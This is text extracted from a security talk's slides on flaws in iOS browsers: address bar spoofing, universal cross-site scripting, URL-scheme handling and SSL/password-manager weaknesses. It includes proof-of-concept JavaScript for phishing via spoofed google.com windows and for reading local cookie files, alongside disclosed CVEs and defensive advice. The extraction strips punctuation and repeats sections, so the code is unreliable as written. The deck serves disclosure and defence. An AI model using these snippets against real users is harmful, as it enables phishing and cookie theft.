bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Address Bar Spoofing Untracked Content
Address Bar Spoofing
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Untracked Content
Replace window content with untracked content
documentwrite andor data URIs are usually good candidates
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) setTimeout(function()wdocumentwrite() hellip)
Address Bar Spoofing
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
Untracked Content
bull CVE-2013-5152 Mobile Safari Address Bar Spoofingreported in iOS 511 fixed in iOS 7
Address Bar Spoofing
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
